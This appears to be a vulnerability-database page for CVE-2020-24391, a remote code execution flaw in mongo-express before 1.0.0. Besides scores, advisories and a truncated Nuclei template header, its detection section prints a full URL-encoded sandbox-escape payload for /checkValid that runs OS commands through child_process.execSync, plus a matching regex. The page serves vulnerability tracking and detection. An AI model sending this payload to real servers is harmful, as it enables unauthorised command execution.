CVE-2020-24391
published 2021-03-30CVE-2020-24391: mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.
PriorityP271critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
75.09%
99.4th percentile
mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mongo-express_project | mongo-express | <= 0.54.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/checkValid
path/public/css/{{randstr}}.css
commanddocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
yara
((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)- →Exploit sends a POST request to /checkValid with a URL-encoded JavaScript payload in the `document` parameter that uses `clearImmediate.constructor` to escape the safer-eval sandbox and execute arbitrary OS commands via `child_process.execSync`.
- →After exploitation, the attacker retrieves command output by fetching a CSS file written to the public directory; a successful RCE response body will match the regex `((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)` with HTTP 200.
- →Shodan, FOFA, and Google dorks can be used to identify exposed Mongo-Express instances as attack targets.
- →The Content-Type `application/x-www-form-urlencoded` is used to deliver the sandbox-escape payload to the /checkValid endpoint; monitor for large or unusual `document` parameter values on this endpoint.
- ·The vulnerability affects mongo-express versions before 1.0.0 only; instances running 1.0.0 or later are not affected.
- ·This CVE may overlap with CVE-2019-10769, so deduplication of alerts may be necessary in environments tracking both. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Remote code execution in mongo-express
osv·2021-04-13·CVSS 9.8
CVE-2020-24391 [CRITICAL] Remote code execution in mongo-express
Remote code execution in mongo-express
mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.
GHSA
Remote code execution in mongo-express
ghsa·2021-04-13·CVSS 9.8
CVE-2020-24391 [CRITICAL] CWE-20 Remote code execution in mongo-express
Remote code execution in mongo-express
mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.
No detection rules found.
Nuclei
Mongo-Express - Remote Code Execution
nuclei·CVSS 9.8
CVE-2020-24391 [CRITICAL] Mongo-Express - Remote Code Execution
Mongo-Express - Remote Code Execution
Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.
Template:
id: CVE-2020-24391
info:
name: Mongo-Express - Remote Code Execution
author: leovalcante
severity: critical
description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execut
No writeups or analysis indexed.
2021-03-30
Published